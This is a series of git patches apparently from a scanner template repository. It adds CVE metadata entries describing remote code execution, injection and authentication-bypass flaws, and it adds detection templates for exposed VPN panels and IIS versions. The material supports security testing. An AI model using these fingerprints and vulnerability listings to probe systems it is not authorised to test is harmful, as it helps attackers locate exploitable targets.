workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 35c7f1e4671d1fc0a75a3312328919fb92ecb365 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 08:12:47 +0000 Subject: [PATCH 35/86] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 9c636adef9..52ff2ed46f 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml 
@@ -45,6 +45,7 @@ on: - 'http/exposed-panels/osnexus-panel.yaml' - 'http/exposed-panels/posteio-admin-panel.yaml' - 'http/exposed-panels/skeepers-panel.yaml' + - 'http/exposures/files/generic-db.yaml' - 'http/misconfiguration/installer/posteio-installer.yaml' - 'http/osint/phishing/kakao-login-phish.yaml' - 'http/osint/phishing/naver-login-phish.yaml' From cbf2c2568d5c60c9b473ee886a1cd07c196d3f8c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 08:13:55 +0000 Subject: [PATCH 36/86] Auto Template Signing [Wed Mar 20 08:13:55 UTC 2024] :robot: --- dns/txt-service-detect.yaml | 1 + http/exposures/files/generic-db.yaml | 1 + http/technologies/wing-ftp-service-detect.yaml | 1 + 3 files changed, 3 insertions(+) diff --git a/dns/txt-service-detect.yaml b/dns/txt-service-detect.yaml index d286a8d2fe..17a8d5e012 100644 --- a/dns/txt-service-detect.yaml +++ b/dns/txt-service-detect.yaml @@ -218,3 +218,4 @@ dns: name: "whimsical" words: - "whimsical" +# digest: 490a00463044022043132b95ad11ec72665418855d60e0d979abbe9957b18f9170981f4f4af22a72022054d2942e7554851cd1f043f99d5e119ff9e8943a635a891927b1897d270383b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml index d6f33746df..99da464258 100644 --- a/http/exposures/files/generic-db.yaml +++ b/http/exposures/files/generic-db.yaml @@ -152,3 +152,4 @@ http: - '!contains(body, " Date: Wed, 20 Mar 2024 08:14:48 +0000 Subject: [PATCH 37/86] Auto Generated cves.json [Wed Mar 20 08:14:48 UTC 2024] :robot: --- cves.json | 14 ++++++++++++-- cves.json-checksum.txt | 2 +- 2 files changed, 13 insertions(+), 3 deletions(-) diff --git a/cves.json b/cves.json index 58062848e9..bef7f939af 100644 --- a/cves.json +++ b/cves.json 
@@ -1386,7 +1386,7 @@ {"ID":"CVE-2021-40149","Info":{"Name":"Reolink E1 Zoom Camera \u003c=3.0.0.716 - Private Key Disclosure","Severity":"medium","Description":"Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability.\n","Classification":{"CVSSScore":"5.9"}},"file_path":"http/cves/2021/CVE-2021-40149.yaml"} {"ID":"CVE-2021-40150","Info":{"Name":"Reolink E1 Zoom Camera \u003c=3.0.0.716 - Information Disclosure","Severity":"high","Description":"Reolink E1 Zoom camera through 3.0.0.716 is susceptible to information disclosure. The web server discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path. An attacker with network-level access to the camera can can download the entire NGINX/FastCGI configurations by querying the /conf/nginx.conf or /conf/fastcgi.conf URI.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-40150.yaml"} {"ID":"CVE-2021-40323","Info":{"Name":"Cobbler \u003c3.3.0 - Remote Code Execution","Severity":"critical","Description":"Cobbler before 3.3.0 allows log poisoning and resultant remote code execution via an XMLRPC method.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-40323.yaml"} -{"ID":"CVE-2021-40438","Info":{"Name":"Apache \u003c= 2.4.48 - Mod_Proxy SSRF","Severity":"critical","Description":"Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2021/CVE-2021-40438.yaml"} +{"ID":"CVE-2021-40438","Info":{"Name":"Apache \u003c= 2.4.48 Mod_Proxy - Server-Side Request Forgery","Severity":"critical","Description":"Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2021/CVE-2021-40438.yaml"} 
{"ID":"CVE-2021-40539","Info":{"Name":"Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution","Severity":"critical","Description":"Zoho ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass vulnerability that can lead to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-40539.yaml"} {"ID":"CVE-2021-40542","Info":{"Name":"Opensis-Classic 8.0 - Cross-Site Scripting","Severity":"medium","Description":"Opensis-Classic Version 8.0 is affected by cross-site scripting. An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-40542.yaml"} {"ID":"CVE-2021-40651","Info":{"Name":"OS4Ed OpenSIS Community 8.0 - Local File Inclusion","Severity":"medium","Description":"OS4Ed OpenSIS Community 8.0 is vulnerable to a local file inclusion vulnerability in Modules.php (modname parameter), which can disclose arbitrary file from the server's filesystem as long as the application has access to the file.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-40651.yaml"} 
@@ -2171,7 +2171,7 @@ {"ID":"CVE-2023-37728","Info":{"Name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","Severity":"medium","Description":"Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37728.yaml"} {"ID":"CVE-2023-37979","Info":{"Name":"Ninja Forms \u003c 3.6.26 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37979.yaml"} {"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"} -{"ID":"CVE-2023-38203","Info":{"Name":"Adobe ColdFusion Deserialization of Untrusted Data","Severity":"critical","Description":"Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. 
Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38203.yaml"} +{"ID":"CVE-2023-38203","Info":{"Name":"Adobe ColdFusion - Deserialization of Untrusted Data","Severity":"critical","Description":"Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38203.yaml"} {"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"} {"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"} {"ID":"CVE-2023-3843","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. 
VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3843.yaml"} 
@@ -2227,6 +2227,7 @@ {"ID":"CVE-2023-42442","Info":{"Name":"JumpServer \u003e 3.6.4 - Information Disclosure","Severity":"medium","Description":"JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-42442.yaml"} {"ID":"CVE-2023-42793","Info":{"Name":"JetBrains TeamCity \u003c 2023.05.4 - Remote Code Execution","Severity":"critical","Description":"In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-42793.yaml"} {"ID":"CVE-2023-43177","Info":{"Name":"CrushFTP \u003c 10.5.1 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43177.yaml"} +{"ID":"CVE-2023-43187","Info":{"Name":"NodeBB XML-RPC Request xmlrpc.php - XML Injection","Severity":"critical","Description":"A remote code execution (RCE) vulnerability in the xmlrpc.php endpoint of NodeBB Inc NodeBB forum software prior to v1.18.6 allows attackers to execute arbitrary code via crafted XML-RPC 
requests.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43187.yaml"} {"ID":"CVE-2023-43261","Info":{"Name":"Milesight Routers - Information Disclosure","Severity":"high","Description":"A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43261.yaml"} {"ID":"CVE-2023-43325","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the data[redirect_url] parameter on user login function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43325.yaml"} {"ID":"CVE-2023-43326","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43326.yaml"} 
@@ -2257,8 +2258,10 @@ {"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"high","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"} {"ID":"CVE-2023-4966","Info":{"Name":"Citrix Bleed - Leaking Session Tokens","Severity":"high","Description":"Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4966.yaml"} {"ID":"CVE-2023-4974","Info":{"Name":"Academy LMS 6.2 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. 
NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4974.yaml"} +{"ID":"CVE-2023-49785","Info":{"Name":"ChatGPT-Next-Web - SSRF/XSS","Severity":"critical","Description":"Full-Read SSRF/XSS in NextChat, aka ChatGPT-Next-Web\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-49785.yaml"} {"ID":"CVE-2023-50290","Info":{"Name":"Apache Solr - Host Environment Variables Leak via Metrics API","Severity":"medium","Description":"Exposure of Sensitive Information to an Unauthorized Actor Vulnerability in Apache Solr.\nThe Solr Metrics API publishes all unprotected environment variables available to each Apache Solr instance. Users can specify which environment variables to hide, however, the default list is designed to work for known secret Java system properties. Environment variables cannot be strictly defined in Solr, like Java system properties can be, and may be set for the entire host,unlike Java system properties which are set per-Java-proccess.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-50290.yaml"} {"ID":"CVE-2023-5074","Info":{"Name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","Severity":"critical","Description":"Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5074.yaml"} +{"ID":"CVE-2023-5089","Info":{"Name":"Defender Security \u003c 4.1.0 - Protection Bypass (Hidden Login Page)","Severity":"medium","Description":"The Defender Security WordPress plugin before 4.1.0 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the login page, even when the hide login page functionality of the plugin is 
enabled.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-5089.yaml"} {"ID":"CVE-2023-50917","Info":{"Name":"MajorDoMo thumb.php - OS Command Injection","Severity":"critical","Description":"MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-50917.yaml"} {"ID":"CVE-2023-50968","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Server Side Request Forgery","Severity":"high","Description":"Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-50968.yaml"} {"ID":"CVE-2023-51467","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Remote Code Execution","Severity":"critical","Description":"The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF)\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-51467.yaml"} 
@@ -2267,6 +2270,8 @@ {"ID":"CVE-2023-5360","Info":{"Name":"WordPress Royal Elementor Addons Plugin \u003c= 1.3.78 - Arbitrary File Upload","Severity":"critical","Description":"Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5360.yaml"} {"ID":"CVE-2023-5375","Info":{"Name":"Mosparo \u003c 1.0.2 - Open Redirect","Severity":"medium","Description":"Open Redirect in GitHub repository mosparo/mosparo prior to 1.0.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5375.yaml"} {"ID":"CVE-2023-5556","Info":{"Name":"Structurizr on-premises - Cross Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository structurizr/onpremises prior to 3194.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5556.yaml"} +{"ID":"CVE-2023-5830","Info":{"Name":"ColumbiaSoft DocumentLocator - Improper Authentication","Severity":"critical","Description":"Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locater application by confirming external DNS interaction/lookups by modifying the value of the client-side SERVER parameter at /api/authentication/login.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5830.yaml"} +{"ID":"CVE-2023-5914","Info":{"Name":"Citrix StoreFront - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting issue which is exploitable without authentication. 
This vulnerability was exploitable through coercing an error message during an XML parsing procedure in the SSO flow.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5914.yaml"} {"ID":"CVE-2023-6018","Info":{"Name":"Mlflow - Arbitrary File Write","Severity":"critical","Description":"An attacker can overwrite any file on the server hosting MLflow without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6018.yaml"} {"ID":"CVE-2023-6020","Info":{"Name":"Ray Static File - Local File Inclusion","Severity":"high","Description":"LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6020.yaml"} {"ID":"CVE-2023-6021","Info":{"Name":"Ray API - Local File Inclusion","Severity":"high","Description":"LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6021.yaml"} 
@@ -2295,6 +2300,8 @@ {"ID":"CVE-2024-1208","Info":{"Name":"LearnDash LMS \u003c 4.10.3 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1208.yaml"} {"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"} {"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. 
This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"} +{"ID":"CVE-2024-1212","Info":{"Name":"Progress Kemp LoadMaster - Command Injection","Severity":"critical","Description":"Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1212.yaml"} +{"ID":"CVE-2024-1698","Info":{"Name":"NotificationX \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"The NotificationX - Best FOMO, Social Proof, WooCommerce Sales Popup \u0026 Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1698.yaml"} {"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"} {"ID":"CVE-2024-21644","Info":{"Name":"pyLoad Flask Config - Access Control","Severity":"high","Description":"pyLoad is the free and open-source Download Manager written in pure Python. 
Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-21644.yaml"} {"ID":"CVE-2024-21645","Info":{"Name":"pyload - Log Injection","Severity":"medium","Description":"A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-21645.yaml"} 
@@ -2307,6 +2314,9 @@ {"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"} {"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"} {"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. 
Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"} +{"ID":"CVE-2024-27198","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27198.yaml"} +{"ID":"CVE-2024-27199","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"high","Description":"In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-27199.yaml"} +{"ID":"CVE-2024-27497","Info":{"Name":"Linksys E2000 1.0.06 position.js Improper Authentication","Severity":"high","Description":"Linksys E2000 Ver.1.0.06 build 1 is vulnerable to authentication bypass via the position.js file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27497.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. 
The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} {"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index f16efa320f..fc1928fe0c 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -d1c0809e63305403ca431401cfcebe07 +0718093f8377862f2723b488bb15e23a From 7868a182637e03082d20798583c4e48b0fd76a8d Mon Sep 17 00:00:00 2001 From: Brandon Hutchinson Date: Wed, 20 Mar 2024 14:32:13 +0000 Subject: [PATCH 38/86] Create softether-vpn-panel.yaml --- http/exposed-panels/softether-vpn-panel.yaml | 28 ++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 http/exposed-panels/softether-vpn-panel.yaml diff --git a/http/exposed-panels/softether-vpn-panel.yaml b/http/exposed-panels/softether-vpn-panel.yaml new file mode 100644 index 0000000000..3ec9615e2f --- /dev/null +++ b/http/exposed-panels/softether-vpn-panel.yaml @@ -0,0 +1,28 @@ +id: softether-vpn-panel + +info: + name: SoftEther VPN Panel - Detect + author: bhutch + severity: info + description: SoftEther VPN panel was detected. + metadata: + max-request: 1 + verified: true + shodan-query: http.title:"SoftEther VPN Server" + tags: panel,vpn,softether + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "SoftEther VPN Server" + + - type: status + status: + - 202 
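Review bot: The status matcher closing the hunk pins `202` rather than the conventional `200`, and nothing in the template says why; if this is the code SoftEther's embedded web server returns for its landing page, a comment above it such as `# SoftEther's built-in HTTP server answers the root page with 202, not 200` would stop a future maintainer from "fixing" it and silently breaking the template. The body matcher rests on the single phrase "SoftEther VPN Server", which may also appear on pages that merely mention the product; anchoring it on the title the shodan-query already relies on, `- "<title>SoftEther VPN Server</title>"`, or adding a second product-specific token under the same matcher would lower the false-positive rate. `info` also lacks a `reference:` entry; a link to the vendor's server documentation would let reviewers confirm the fingerprint.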
From e8b983ce786ddb7655c08a9bb4a0c8bdd56fc359 Mon Sep 17 00:00:00 2001 From: Brandon Hutchinson Date: Wed, 20 Mar 2024 14:43:33 +0000 Subject: [PATCH 39/86] Update fingerprinthub-web-fingerprints.yaml --- http/technologies/fingerprinthub-web-fingerprints.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/technologies/fingerprinthub-web-fingerprints.yaml b/http/technologies/fingerprinthub-web-fingerprints.yaml index d2c5098ffb..e42e6eb61e 100755 --- a/http/technologies/fingerprinthub-web-fingerprints.yaml +++ b/http/technologies/fingerprinthub-web-fingerprints.yaml @@ -11440,6 +11440,7 @@ http: name: softether-vpn words: -
  • manage this vpn server or vpn bridge
      + case-insensitive: true - type: word name: softnext-spam From 752b0fbc3d0dfaf473b1990278acf6e482f3d6ec Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 20 Mar 2024 23:12:09 +0530 Subject: [PATCH 40/86] Update microsoft-iis-version.yaml --- http/technologies/microsoft/microsoft-iis-version.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/http/technologies/microsoft/microsoft-iis-version.yaml b/http/technologies/microsoft/microsoft-iis-version.yaml index 7a85340474..ac03e25967 100644 --- a/http/technologies/microsoft/microsoft-iis-version.yaml +++ b/http/technologies/microsoft/microsoft-iis-version.yaml @@ -9,11 +9,14 @@ info: max-request: 1 tags: tech,microsoft,iis + http: - method: GET path: - "{{BaseURL}}" + host-redirects: true + max-redirects: 4 matchers-condition: and matchers: - type: word @@ -21,10 +24,6 @@ http: words: - "IIS" - - type: status - status: - - 200 - extractors: - type: kval part: header From afc3d77d80752f203f79db73090b33255fa86273 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 17:44:10 +0000 Subject: [PATCH 41/86] Auto Generated New Template Addition List [Wed Mar 20 17:44:10 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e60a673523..47df011d4e 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ dns/soa-detect.yaml +dns/spf-record-detect.yaml dns/txt-service-detect.yaml 